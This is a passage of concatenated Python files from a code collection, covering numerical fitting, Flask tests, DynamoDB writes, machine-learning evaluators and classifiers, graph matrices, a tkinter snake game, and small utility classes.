\n    \n    Q=QR[0] 
\n    R=QR[1]
\n    \n    Q_T= np.transpose(Q)
\n    \n    b=np.dot(Q_T,u) # Right-hand side
\n    \n    alpha = np.zeros(N)
\n    R_inv=np.linalg.inv(R)
\n    alpha= np.dot(R_inv,b) # alpha=R_inv * Q_T * u
\n    \n    \n    return alpha
\n    \n# c) -----------------------------------------------------------------
\n\ndef CoeffCos(N,k,u): #returns the coefficients of the \"best fit function\" with a basis of cosine functions
\n    m=len(k)
\n    A = [[np.cos(j*k[i]) for j in range(N)] for i in range(m)] 
\n    A_T= np.transpose(A)
\n    QR= np.linalg.qr(A)
\n    \n    Q=QR[0]
\n    R=QR[1]
\n    \n    Q_T= np.transpose(Q)
\n    \n    b=np.dot(Q_T,u) # Right-hand side
\n    \n    alpha = np.zeros(N)
\n\n    R_inv=np.linalg.inv(R)
\n    alpha= np.dot(R_inv,b) # alpha=R_inv * Q_T * u
\n    \n    return alpha
\n    \n# d) -----------------------------------------------------------------
\n\ndef PolFit(x,a): #returns a vector which contains the values of the polynomial-fit-function on the grid points x 
\n    u = np.zeros(len(x))
\n    for j in range(len(x)):
\n        for i in range(len(a)):
\n            u[j]+=a[i]*pow(x[j],i)
\n    return u
\n\ndef CosFit(x,a): # same as PolFit, but for the cosine-fit-function
\n    u = np.zeros(len(x))
\n    for j in range(len(x)):
\n        for i in range(len(a)):
\n            u[j]+=a[i]*np.cos(x[j]*i)
\n    return u
\n    \n\n\nx = np.arange(k[0],k[len(k)-1],0.01) # domain-points where we plot the fit-functions 
\n\nalpha_Pol= CoeffPol(10,k,u) # coefficient vector for the polynomial function\n
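# the fit value is the plain polynomial sum alpha_0 + alpha_1*x + ... + alpha_9*x**9, evaluated pointwise
\nu_pol=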
PolFit(x,alpha_Pol) # Polynomial function u_pol which fits u \n\nalpha_Cos= CoeffCos(10,k,u) # coefficients of the function with cos basis\nu_cos= CosFit(x,alpha_Cos) # cos-function which fits u\n\n\n#plot of the functions u, u_pol and u_cos\nplt.figure(1)\nline_u, = plt.plot(k,u,'ro', label='Line 1')\nline_pol, = plt.plot(x,u_pol, label='Line 2')\nline_cos, = plt.plot(x,u_cos, label='Line 3')\nplt.legend([line_u, line_pol,line_cos], ['u', 'u_pol','u_cos'])\nplt.title('least square best fits')\n\nplt.xlabel('Wave vector k')\nplt.ylabel('Frequency w(k)')\nplt.show()\n \n# e) -----------------------------------------------------------------\n\ndef maxRes(N,u,u2): # returns the value of maximal residual \n \n res=np.zeros(len(u))\n \n for i in range(len(u)): \n res[i]= np.absolute(u[i]-u2[i]) #create a vector \"res\" with all the residuals |u-u_fit|\n \n max_res= np.amax(np.absolute(res)) #function \"amax\" returns the bigest entry of an array \n \n return max_res\n\n# Now for N =1,2,...,10 :\nresMaxVector_pol= np.zeros(10)\nresMaxVector_cos= np.zeros(10)\n\nfor N in np.arange(1,11,1): # For each N calculate the fit-functions and the max residual \n \n alpha_Pol= CoeffPol(N,k,u) \n u_pol= PolFit(k,alpha_Pol) \n resMaxVector_pol[N-1]=maxRes(N,u,u_pol) # becomes a vector with all the max|u-u_pol| for each N\n \n alpha_Cos= CoeffCos(N,k,u) \n u_cos= CosFit(k,alpha_Cos)\n resMaxVector_cos[N-1]=maxRes(N,u,u_cos) # becomes a vector with all the max|u-u_cos| for each N\n\n\n# plot of the max_res of the functions u_plot and u_cos\nplt.figure(2)\nres_pol, = plt.plot(np.arange(1,11,1),resMaxVector_pol,label='Line 1')\nres_cos, = plt.plot(np.arange(1,11,1),resMaxVector_cos, label='Line 2')\nplt.legend([res_pol,res_cos], ['max.res_pol','max.res_cos'])\nplt.title('maximal residuals')\n\nplt.xlabel('Basis order N')\nplt.ylabel('Maximal residuals')\nplt.show()\n\n# f) -----------------------------------------------------------------\n# See pdf-file\n","sub_path":"1Hw/exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"439778499","text":"\"\"\"Using pytest\"\"\"\n\nfrom flask_restful import Api, Resource\nfrom flask import jsonify\nimport json\nfrom app import app\n\ntest_client = app.test_client()\n\nimport sys\nimport os\n\nsys.path.append(os.path.dirname(os.path.realpath(__file__)) + \"/../src\")\n\nfrom membrane import parser\n\n\ndef test_basic_membrane():\n \"\"\"Test Flask\"\"\"\n\n @app.route(\"/test_basic_membrane\")\n @parser({\"val0\": int})\n def test_basic_membrane(*args):\n return jsonify(args)\n\n res = test_client.get(\"/test_basic_membrane?limit=0&val0=0\").json\n assert res[0][\"val0\"] == 0\n\n\ndef test_multi_layer_membrane():\n \"\"\"Test Flask\"\"\"\n\n @app.route(\"/test_multi_layer_membrane\")\n @parser({\"val0\": int, \"val1\": int}, {\"val2\": int})\n def test_multi_layer_membrane(*args):\n return jsonify(args)\n\n res = test_client.get(\n \"/test_multi_layer_membrane?val0=0&val1=1&val2=2\"\n ).json\n assert res[0][\"val0\"] == 0\n assert res[0][\"val1\"] == 1\n assert res[1][\"val2\"] == 2\n\n\ndef test_membrane2():\n \"\"\"Test Flask-RESTful\"\"\"\n\n class Root(Resource):\n @parser({\"limit\": int})\n def get(self, *args):\n return args, 200\n\n api = Api(app)\n api.add_resource(Root, \"/test_membrane2\")\n\n res = test_client.get(\"/test_membrane2?limit=0\").json\n assert res[0][\"limit\"] == 0\n\n\nif __name__ == \"__main__\":\n 
test_basic_membrane()
\n    test_multi_layer_membrane()
\n    test_membrane2()
\n","sub_path":"tests/test_all.py","file_name":"test_all.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"527690894","text":"import boto3
\n\nclient = boto3.client('dynamodb')
\nresponse = client.put_item(
\n    TableName='Students',
\n    Item={
\n        'id': {'S':'127'},
\n        'name': {'S':'Rohit'},
\n        'age': {'N':'35'},
\n        'isMale': {'BOOL':True},
\n        'course':{'S':'HitMan'}
\n    })
\nprint(response)
\n","sub_path":"DynamoDB/PutDDBUsingClient.py","file_name":"PutDDBUsingClient.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"181305904","text":"# Written by Till Hoffmann
\n# (http://stackoverflow.com/questions/18228966/how-can-matplotlib-2d-patches-be-transformed-to-3d-with-arbitrary-normals)
\n#
\n\nimport numpy as np
\nfrom mpl_toolkits.mplot3d import art3d
\n\ndef rotation_matrix(d):
\n    \"\"\"
\n    Calculates a rotation matrix given a vector d. The direction of d
\n    corresponds to the rotation axis. The length of d corresponds to
\n    the sin of the angle of rotation.
\n\n    Variant of: http://mail.scipy.org/pipermail/numpy-discussion/2009-March/040806.html
\n    \"\"\"
\n    sin_angle = np.linalg.norm(d)
\n\n    if sin_angle == 0:
\n        return np.identity(3)
\n\n    d /= sin_angle
\n\n    eye = np.eye(3)
\n    ddt = np.outer(d, d)
\n    skew = np.array([[ 0, d[2], -d[1]],
\n                 [-d[2], 0, d[0]],
\n                 [d[1], -d[0], 0]], dtype=np.float64)
\n\n    M = ddt + np.sqrt(1 - sin_angle**2) * (eye - ddt) + sin_angle * skew
\n    return M
\n\ndef pathpatch_2d_to_3d(pathpatch, z = 0, normal = 'z'):
\n    \"\"\"
\n    Transforms a 2D Patch to a 3D patch using the given normal vector.
\n\n    The patch is projected into the XY plane, rotated about the origin
\n    and finally translated by z.
\n    \"\"\"
\n    if type(normal) is str: #Translate strings to normal vectors
\n        index = \"xyz\".index(normal)
\n        normal = np.roll((1.0,0,0), index)
\n\n    normal /= np.linalg.norm(normal) #Make sure the vector is normalised
\n\n    path = pathpatch.get_path() #Get the path and the associated transform
\n    trans = pathpatch.get_patch_transform()
\n\n    path = trans.transform_path(path) #Apply the transform
\n\n    pathpatch.__class__ = art3d.PathPatch3D #Change the class
\n    pathpatch._code3d = path.codes #Copy the codes
\n    pathpatch._facecolor3d = pathpatch.get_facecolor() #Get the face color
\n\n    verts = path.vertices #Get the vertices in 2D
\n\n    d = np.cross(normal, (0, 0, 1)) #Obtain the rotation vector
\n    M = rotation_matrix(d) #Get the rotation matrix
\n\n    pathpatch._segment3d = np.array([np.dot(M, (x, y, 0)) + (0, 0, z) for x, y in verts])
\n\ndef pathpatch_translate(pathpatch, delta):
\n    \"\"\"
\n    Translates the 3D pathpatch by the amount delta.
\n    \"\"\"
\n    pathpatch._segment3d += delta
\n","sub_path":"pyram/draw/draw_patch_3d.py","file_name":"draw_patch_3d.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"614576118","text":"print(\"Input model of RNA: AUGGUCUACAUAGCUGACAAACAGCACGUAGCAAUCGGUCGAAUCUCGAGAGGCAUAUGGUCACAUGAUCGGUCGAGCGUGUUUCAAAGUUUGCGCCUAG\")
\nrna = input(\"Enter the RNA: \")
\nprint(\"Input model of introns: AUCGGUCGAA,AUCGGUCGAGCGUGU\")
\nintrons = input(\"Enter the introns: \")
\nlist_introns = introns.split(',')
\n\nfor i in list_introns:
\n    if i in rna:
\n        rna = rna.replace(i, '')
\n\n
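# excising every intron substring leaves only the exons, i.e. the mature transcript
\nprint(\"Mature transcript (mRNA):\", rna)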
\n","sub_path":"splicing.py","file_name":"splicing.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"59921257","text":"import copy
\nimport numpy as np
\n\nfrom chainer import reporter
\nimport chainer.training.extensions
\n\nfrom chainercv.evaluations import eval_instance_segmentation_voc
\nfrom chainercv.utils import apply_to_iterator
\n\n\nclass InstanceSegmentationVOCEvaluator(chainer.training.extensions.Evaluator):
\n\n    \"\"\"An evaluation extension of instance-segmentation by PASCAL VOC metric.
\n\n    This extension iterates over an iterator and evaluates the prediction
\n    results by average precisions (APs) and mean of them
\n    (mean Average Precision, mAP).
\n    This extension reports the following values with keys.
\n    Please note that :obj:`'ap/<label_names[l]>'` is reported only if
\n    :obj:`label_names` is specified.
\n\n    * :obj:`'map'`: Mean of average precisions (mAP).
\n    * :obj:`'ap/<label_names[l]>'`: Average precision for class \\
\n        :obj:`label_names[l]`, where :math:`l` is the index of the class. \\
\n        For example, this evaluator reports :obj:`'ap/aeroplane'`, \\
\n        :obj:`'ap/bicycle'`, etc. if :obj:`label_names` is \\
\n        :obj:`~chainercv.datasets.sbd_instance_segmentation_label_names`. \\
\n        If there is no bounding box assigned to class :obj:`label_names[l]` \\
\n        in either ground truth or prediction, it reports :obj:`numpy.nan` as \\
\n        its average precision. \\
\n        In this case, mAP is computed without this class.
\n\n    Args:
\n        iterator (chainer.Iterator): An iterator. Each sample should be
\n            following tuple :obj:`img, bbox, label` or
\n            :obj:`img, bbox, label, difficult`.
\n            :obj:`img` is an image, :obj:`bbox` is coordinates of bounding
\n            boxes, :obj:`label` is labels of the bounding boxes and
\n            :obj:`difficult` is whether the bounding boxes are difficult or
\n            not. If :obj:`difficult` is returned, difficult ground truth
\n            will be ignored from evaluation.
\n        target (chainer.Link): An instance-segmentation link. This link must
\n            have :meth:`predict` method that takes a list of images and returns
\n            :obj:`bboxes`, :obj:`labels` and :obj:`scores`.
\n        iou_thresh (float): Intersection over Union (IoU) threshold for
\n            calculating average precision. The default value is 0.5.
\n        use_07_metric (bool): Whether to use PASCAL VOC 2007 evaluation metric
\n            for calculating average precision. The default value is
\n            :obj:`False`.
\n        label_names (iterable of strings): An iterable of names of classes.
\n            If this value is specified, average precision for each class is
\n            also reported with the key :obj:`'ap/<label_names[l]>'`.
\n    \"\"\"
\n\n    trigger = 1, 'epoch'
\n    default_name = 'validation'
\n    priority = chainer.training.PRIORITY_WRITER
\n\n    def __init__(
\n            self, iterator, target,
\n            iou_thresh=0.5, use_07_metric=False, label_names=None
\n    ):
\n        super().__init__(iterator, target)
\n        self.iou_thresh = iou_thresh
\n        self.use_07_metric = use_07_metric
\n        self.label_names = label_names
\n\n    def evaluate(self):
\n        iterator = self._iterators['main']
\n        target = self._targets['main']
\n\n        if hasattr(iterator, 'reset'):
\n            iterator.reset()
\n            it = iterator
\n        else:
\n            it = copy.copy(iterator)
\n\n        in_values, out_values, rest_values = apply_to_iterator(
\n            target.predict, it)
\n        # delete unused iterators explicitly
\n        del in_values
\n\n        pred_masks, pred_labels, pred_scores = out_values
\n        gt_masks, gt_labels = rest_values
\n\n        result = eval_instance_segmentation_voc(
\n            pred_masks, pred_labels, pred_scores,
\n            gt_masks, gt_labels,
\n            iou_thresh=self.iou_thresh,
\n            use_07_metric=self.use_07_metric)
\n\n        report = {'map': result['map']}
\n\n        if self.label_names is not None:
\n            for l, label_name in enumerate(self.label_names):
\n                try:
\n                    report['ap/{:s}'.format(label_name)] = result['ap'][l]
\n                except IndexError:
\n                    report['ap/{:s}'.format(label_name)] = np.nan
\n\n        observation = {}
\n        with reporter.report_scope(observation):
\n            reporter.report(report, target)
\n        return observation
\n","sub_path":"evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":4255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"351601533","text":"#!/usr/bin/python\r
\n\r\nimport time\r
\n\r\nfilename = input(\"Enter the file name: \")\r
\nGraph = open(filename, \"r\")\r
\n\r\nnm = Graph.readline().split()\r
\n\r\ndef get_mass(file):\r
\n    data = []\r
\n    m = int(nm[1])\r
\n    while m > 0:\r
\n        m -= 1\r
\n        data.append(file.readline().split())\r
\n    return data\r
\n\r\ndata = get_mass(Graph)\r
\n\r\ndef incedent(file):\r
\n    incedent_matrix = []\r
\n    for edge in range(int(nm[0])):\r
\n        edges = []\r
\n        for j in range(int(nm[1])):\r
\n            if edge + 1 == int(file[j][0]) == int(file[j][1]):\r
\n                edges.append(2)\r
\n            elif edge + 1 == int(file[j][0]):\r
\n                edges.append(-1)\r
\n            elif edge + 1 == int(file[j][1]):\r
\n                edges.append(1)\r
\n            else:\r
\n                edges.append(0)\r
\n        incedent_matrix.append(edges)\r
\n    return incedent_matrix\r
\n\r\ndef symizh(file):\r
\n    symizh_matrix = [[0 for i in range(int(nm[0]))] for j in range(int(nm[0]))]\r
\n    for i in range(int(nm[1])):\r
\n        k = int(file[i][0])\r
\n        l = int(file[i][1])\r
\n        symizh_matrix[k-1][l-1] = 1\r
\n    return symizh_matrix\r
\n\r\ndef print_matrix(m):\r
\n    edge = int(1)\r
\n    for i in m:\r
\n        print('{0:3d}'.format(edge), end=\" \")\r
\n        for j in i:\r
\n            print('{0:2d}'.format(j), end=\" \")\r
\n        edge=int(edge)+1\r
\n        print()\r
\n\r\ndef write_to_file(matrix, mode):\r
\n    with open(\"Result.txt\", mode) as Result:\r
\n        for i in matrix:\r
\n            Result.write(str(i))\r
\n            Result.write(\"\\n\")\r
\n\r\n\r\n\r\nif __name__ == \"__main__\": \r
\n\r\n    print(nm)\r
\n    answer = input(\"Convert to an incidence matrix? [y/n] \")\r
\n\r\n    flag = False\r
\n\r\n    if answer == 'y':\r
\n        flag = True\r
\n        write_to_file(incedent(data), \"w\")\r
\n        print(\" \", end=\" \")\r
\n        for i in range(int(nm[1])):\r
\n            print('{0:2d}'.format(i+1), end=\" \")\r
\n        print()\r
\n        print_matrix(incedent(data))\r
\n\r\n    answer = input(\"Convert to an adjacency matrix? [y/n] \")
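\r\n    # if confirmed: write the adjacency matrix built by symizh() to Result.txt and print it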
\r\n\r\n    if answer == 'y':\r
\n        if flag:\r
\n            mode=\"a\"\r
\n        else: mode=\"w\"\r
\n        write_to_file(symizh(data), mode)\r
\n        print(\" \", end=\" \")\r
\n        for i in range(int(nm[0])):\r
\n            print('{0:2d}'.format(i+1), end=\" \")\r
\n        print()\r
\n        print_matrix(symizh(data))\r
\n        time.sleep(5)\r
\n\r\nGraph.close()\r
\n","sub_path":"src/test/resources/testset-UKR/47/47.py","file_name":"47.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"372209993","text":"import numpy as np
\nimport pickle
\nfrom multiprocessing import Pool
\n\nfrom sklearn.svm import SVC, SVR
\nfrom sklearn.decomposition import PCA
\n\n\nENSEMBLE_FILE_PATH = '/Users/david/ColumbiaCS/bda/project/final-website/python/Classifiers/ensemble.pkl'
\n\n\nclass EnsembleSVC(object):
\n    def __init__(self, numSvr, pcaCount=None, kernel='rbf', C=10, gamma=0.1, degree=2):
\n        self.numSvr = numSvr
\n        self.kernel = kernel
\n        self.C = C
\n        self.gamma = gamma
\n        self.degree = degree
\n        self.svrList = [SVR(kernel=kernel, C=C, degree=degree, gamma=gamma) for x in range(numSvr)]
\n        self.svc = SVC(kernel='poly', C=C, degree=degree, gamma=gamma)
\n        self.pca = PCA(n_components=pcaCount) if pcaCount else None
\n\n    def trainSVR(self, svr, X, y):
\n        svr.fit(X, y)
\n        return svr
\n\n    def predictSVR(self, svr, X):
\n        return svr.predict(X)
\n\n    def fit(self, X_train, y_train, n_jobs=8):
\n        p = Pool(n_jobs)
\n        dataSplitX = np.array_split(X_train, self.numSvr + 1)
\n        dataSplitY = np.array_split(y_train, self.numSvr + 1)
\n        trainingListX = dataSplitX[:-1]
\n        trainingListY = dataSplitY[:-1]
\n        validationX = dataSplitX[-1]
\n        validationY = dataSplitY[-1]
\n        self.svrList = p.starmap(self.trainSVR, zip(self.svrList, trainingListX, trainingListY))
\n\n        predList = p.starmap(self.predictSVR, zip(self.svrList, [validationX for idx in range(self.numSvr)]))
\n        svrFeatures = np.stack(predList, axis=1)
\n        pcaFeatures = self.pca.fit_transform(svrFeatures) if self.pca else svrFeatures
\n        self.svc.fit(pcaFeatures, validationY)
\n\n    def predict(self, X, n_jobs=8):
\n        p = Pool(n_jobs)
\n        predList = p.starmap(self.predictSVR, zip(self.svrList, [X for idx in range(self.numSvr)]))
\n        svrFeatures = np.stack(predList, axis=1)
\n        pcaFeatures = self.pca.transform(svrFeatures) if self.pca else svrFeatures
\n        return self.svc.predict(pcaFeatures)
\n\n\ndef loadEnsembleSVC():
\n    with open(ENSEMBLE_FILE_PATH, 'rb') as file:
\n        return pickle.load(file)","sub_path":"python/Classifiers/EnsembleClassifier.py","file_name":"EnsembleClassifier.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
{"seq_id":"624931374","text":"from tkinter import *
\nimport time
\nimport queue
\nimport threading
\nimport random
\n\nclass World(Tk):
\n    '''
\n    Models the whole game board
\n    '''
\n    def __init__(self,queue):
\n        Tk.__init__(self)
\n        self.queue=queue
\n        self.is_game_over=False
\n        # create the canvas
\n        self.canvas = Canvas(self, width=495, height=305, bg='black')
\n        self.canvas.pack()
\n        # draw the snake and the food
\n        self.snake = self.canvas.create_line((0, 0), (0, 0), fill=\"yellow\", width=10)
\n        self.food = self.canvas.create_rectangle(0, 0, 0, 0, fill='#FFCC4C', outline='#FFCC4C')
\n        self.points_earned = self.canvas.create_text(455, 15, fill='white', text='SCORE: 0')
\n        self.queue_handler()
\n\n    def queue_handler(self):
\n        try:
\n            # keep pulling messages from the queue, hence the endless loop
\n            while True:
\n                # non-blocking get
\n                task = self.queue.get(block=False)
\n                if task.get(\"game_over\"):
\n                    self.game_over()
\n                if task.get(\"move\"):
\n                    points = [x for point in task['move'] for x in point]
\n                    # redraw the snake\n                    
self.canvas.coords(self.snake, *points)\n # 同样道理,还需要处理食物,得分\n if task.get(\"food\"):\n self.canvas.coords(self.food,*task['food'])\n elif task.get('points_earned'):\n self.canvas.itemconfigure(self.points_earned,\n text='score:{}'.format(task['points_earned']))\n self.queue.task_done() #task_done\n\n except queue.Empty: # 爆出队列为空异常\n # 游戏没结束时 在100ms后调用queue_handler函数\n if not self.is_game_over:\n # after的含义是,在多少毫秒后调用后面的函数\n self.canvas.after(100, self.queue_handler)\n\n def game_over(self):\n '''\n 游戏结束,清理现场\n '''\n self.is_game_over = True\n self.canvas.create_text(200,150,fill='white',text=\"Game Over\")\n quitbtn= Button(self, text=\"Quit\",command=self.destroy)\n rebtn = Button(self, text=\"Again\", command=self.__init__)\n self.canvas.create_window(200,180,anchor='nw',window=quitbtn)\n self.canvas.create_window(240,180, anchor='nw', window=rebtn)\n\nclass Food():\n '''\n 功能:\n 1. 出现在画面的某一个地方\n 2. 一旦被吃,则增加蛇的分数\n '''\n def __init__(self,queue):\n '''\n 自动产生一个食物\n '''\n self.queue = queue\n self.new_food()\n def new_food(self):\n '''\n 功能:产生一个食物\n 产生一个食物的过程就是随机产生一个食物坐标的过程\n '''\n # 注意横纵坐标产生的范围\n x = random.randrange(5,480,10)\n # 同理产生y坐标\n y = random.randrange(5,295,10)\n # 需要注意的是,我们的正给游戏屏幕一般不需要把他设置成正方形\n self.position = x, y # position存放食物的位置\n # 队列,就是一个不能够随意访问内部元素,只能从头弹出一个元素并只能从队尾追加元素的list\n # 把一个食物产生的消息放入队列\n # 消息的格式,自己定义\n # 我的定义是: 消息是一个dict, k代表消息类型,v代表此类型的数据\n self.exppos=x-5,y-5,x+5,y+5\n self.queue.put({\"food\": self.exppos})\n\n\nclass Snake(threading.Thread):\n '''\n 蛇的功能:\n 1. 蛇能动,由我们的上下左右按键控制\n 2. 蛇每次动,都需要重新计算蛇头的位置\n 3. 检测是否游戏完事的功能\n '''\n\n def __init__(self, world, queue):\n threading.Thread.__init__(self)\n self.world = world\n self.queue=queue\n self.daemon=True #守护线程,当主进程结束时,线程自动结束\n self.points_earned = 0 # 游戏分数\n self.food = Food(queue)\n self.direction='Left'\n self.snake_points = [(495, 55), (485, 55),(475, 55), (465, 55), (455, 55)]\n self.start()\n\n def run(self):\n '''\n 一旦启用多线程就需要调用此函数\n 要求蛇一直都在跑\n '''\n if self.world.is_game_over:\n self._delete()\n\n while not self.world.is_game_over:\n self.queue.put({\"move\": self.snake_points})\n time.sleep(0.2) # 控制蛇的速度\n self.move()\n\n def key_pressed(self, e):\n # keysym是按键名称\n self.direction = e.keysym\n\n def move(self):\n '''\n 负责蛇的移动\n 1. 重新计算蛇头的坐标\n 2. 当蛇头跟食物相遇,则加分,重新生成食物,通知world,加分\n 3. 
否则, 蛇需要动\n '''\n new_snake_point = self.cal_new_position() # 重新计算蛇头位置\n\n # 蛇头位置跟食物位置相同\n if self.food.position == new_snake_point:\n self.points_earned += 1 # 得分加1\n self.queue.put({\"points_earned\": self.points_earned})\n self.food.new_food() # 就得食物被吃掉,产生新的食物\n else:\n # 需要注意蛇的信息的保存方式\n # 每次移动是删除存放蛇的最前位置,并在后面追加\n self.snake_points.pop(0)\n # 判断程序是否退出,因为新的蛇可能撞墙\n self.check_game_over(new_snake_point)\n self.snake_points.append(new_snake_point)\n\n def cal_new_position(self):\n '''\n 计算新的 蛇头的位置\n '''\n last_x, last_y = self.snake_points[-1]\n if self.direction == \"Up\": # direction负责存储蛇移动的方向\n new_snake_point = last_x, last_y - 10 # 每次移动的跨度是10像素\n elif self.direction == 'Down':\n new_snake_point = last_x, last_y + 10\n elif self.direction == 'Left':\n new_snake_point = last_x-10, last_y\n elif self.direction == 'Right':\n new_snake_point = last_x+10, last_y\n return new_snake_point\n\n def check_game_over(self, snake_point):\n '''\n 判断的依据是蛇头是否和墙相撞\n '''\n # 把蛇头的坐标拿出来,跟墙的坐标进行判断\n x, y = snake_point[0], snake_point[1]\n if not -5 < x < 505 or not -5 < y < 315 or snake_point in self.snake_points:\n self.queue.put({'game_over': True})\n\nif __name__ == \"__main__\":\n # 实例queue模块中的Queue类,先进先出\n global q, world\n q=queue.Queue()\n world = World(q)\n snake = Snake(world, q)\n # 绑定上下左右键\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.bind('', snake.key_pressed)\n world.mainloop()\n","sub_path":"编程实战/Snake.py","file_name":"Snake.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"233152136","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\n\nimport keras\nfrom keras.utils import to_categorical\nfrom keras.datasets import fashion_mnist\n\nclass DocDataset:\n def __init__(self):\n print(\"class create\")\n\n def load_train_data(self):\n (x_train, y_train), _ = fashion_mnist.load_data()\n x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)\n x_train = x_train.astype('float32') / 255\n\n x_train_s, x_train_ref, y_train_ref = [], [], []\n\n for i in range(len(x_train)):\n \n # スニーカーxデータ\n if (y_train[i] == 7):\n x_train_s.append(x_train[i])\n # スニーカーデータ以外\n else:\n x_train_ref.append(x_train[i])\n y_train_ref.append(y_train[i])\n \n x_train_ref = np.array(x_train_ref)\n x_train_snicor = np.array(x_train_s)\n\n randon_seed = np.random.choice(np.arange(0, len(x_train_ref)), 6000, replace=False)\n x_train_ref = [x_train_ref[i] for i in randon_seed]\n y_train_ref = [y_train_ref[i] for i in randon_seed]\n\n # レファレンスネットワークのデータ。スニーカー以外のデータセット\n x_train_ref = np.array(x_train_ref)\n y_train_ref = to_categorical(y_train_ref)\n\n print(\"resizing snicor images ...\")\n x_train_snicor = self.resize(x_train_snicor)\n print(\"resizing references images ...\")\n x_train_ref = self.resize(x_train_ref)\n y_train_ref = y_train_ref\n\n return x_train_snicor, x_train_ref, y_train_ref\n\n def load_test_data(self):\n _, (x_test, y_test) = fashion_mnist.load_data()\n x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)\n x_test = x_test.astype('float32') / 255\n x_test_s, x_test_b = [], []\n\n for i in range(len(x_test)):\n # スニーカーのテストデータ\n if y_test[i] == 7:\n x_test_s.append(x_test[i].reshape((x_test.shape[1:])))\n # ブーツのデータセット\n if y_test[i] == 9:\n x_test_b.append(x_test[i].reshape((x_test.shape[1:])))\n\n x_test_snicer = np.array(x_test_s)\n x_test_boot = np.array(x_test_b)\n\n x_test_snicer = self.resize(x_test_snicer)\n 
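# resize() upscales the 28x28 grayscale crops to 224x224 RGB, matching an ImageNet-sized input\n        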
x_test_boot = self.resize(x_test_boot)\n\n return x_test_snicer, x_test_boot\n \n def resize(self, x):\n x_out = []\n\n for i in range(len(x)):\n img = cv2.cvtColor(x[i], cv2.COLOR_GRAY2RGB)\n img = cv2.resize(img,dsize=(224, 224))\n x_out.append(img)\n\n return np.array(x_out)","sub_path":"dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645602960","text":"class base():\n def __init__(self):\n self.type = \"\"\n self.speed = 0\n def swim_result(self, distance):\n print(\"Время преодоления дистанции \", self.type, \" = \", distance/self.speed)\n\nclass Shark(base):\n def __init__(self):\n self.type = \"Shark\"\n self.speed = 3\n\nclass Human(base):\n def __init__(self):\n self.type = \"Human\"\n self.speed = 1\n\nclass Boat(base):\n def __init__(self):\n self.type = \"Boat\"\n self.speed = 10\n\nclass Factory():\n def build(typ):\n if typ == \"Shark\":\n return Shark()\n elif typ == \"Human\":\n return Human()\n elif typ == \"Boat\":\n return Boat()\n\ns = Factory.build(\"Shark\")\nh = Factory.build(\"Human\")\nb = Factory.build(\"Boat\")\n\ns.swim_result(100)\nh.swim_result(100)\nb.swim_result(100)\n\n\n\n ","sub_path":"Factory.py","file_name":"Factory.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"128702768","text":"class Text(str):\n\n def __str__(self):\n exchange = super().__str__().replace('>', '>').replace('<', '<')\n if exchange == '\"':\n exchange = exchange.replace('\"', '"')\n return exchange.replace('\\n', '\\n
    \\n')\n\n\nclass Elem:\n\n def __init__(self, tag='div', attr={}, content=None, tag_type='double'):\n if not isinstance(content, (Text, Elem)):\n if type(content) != list and type(content) != None.__class__:\n raise self.ValidationError()\n self.content = [content] if not type(content) == list else content\n self.attr = attr\n self.type = tag_type\n self.space = 0\n self.tag = tag\n\n class ValidationError(Exception):\n def __init__(self):\n Exception.__init__(self, \"Error\")\n\n def __str__(self):\n html = self.create_content()\n if_content = \"\\n%s\" % (\" \" * self.space, self.tag) if self.create_content()\\\n else \"\" % self.tag\n if self.type == 'double':\n return \"<%s%s>%s%s\" % (self.tag, self.create_attr(), html, if_content)\n else:\n return \"<%s%s/>%s\" % (self.tag, self.create_attr(), html)\n\n def create_attr(self):\n attr_html = ''\n for k, v in self.attr.items():\n attr_html += ''' %s=\\\"%s\\\"''' % (k, str(v))\n return attr_html\n\n def create_content(self):\n content_html = ''\n for item in self.content:\n if isinstance(item, Elem):\n self.set_space(item)\n if item:\n content_html += \"\\n %s%s\" % (\" \" * self.space, str(item))\n return content_html\n\n def set_space(self, elem):\n if isinstance(elem, Elem):\n elem.space += 1\n if isinstance(elem.content[0], Elem):\n elem.set_space(elem.content[0])\n\n def add_content(self, content):\n if isinstance(content, (Elem, Text)):\n self.content.append(content)\n else:\n raise self.ValidationError()\n","sub_path":"ex04/elem.py","file_name":"elem.py","file_ext":"py","file_size_in_byte":2020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"648435790","text":"#\n# This code is taken from https://github.com/PrincetonML/SIF\n#\n# All rights remain with the original authors.\n#\n\nfrom sklearn.decomposition import TruncatedSVD\n\ndef compute_pc(X,npc=1):\n \"\"\"\n Compute the principal components. DO NOT MAKE THE DATA ZERO MEAN!\n :param X: X[i,:] is a data point\n :param npc: number of principal components to remove\n :return: component_[i,:] is the i-th pc\n \"\"\"\n svd = TruncatedSVD(n_components=npc, n_iter=7, random_state=0)\n 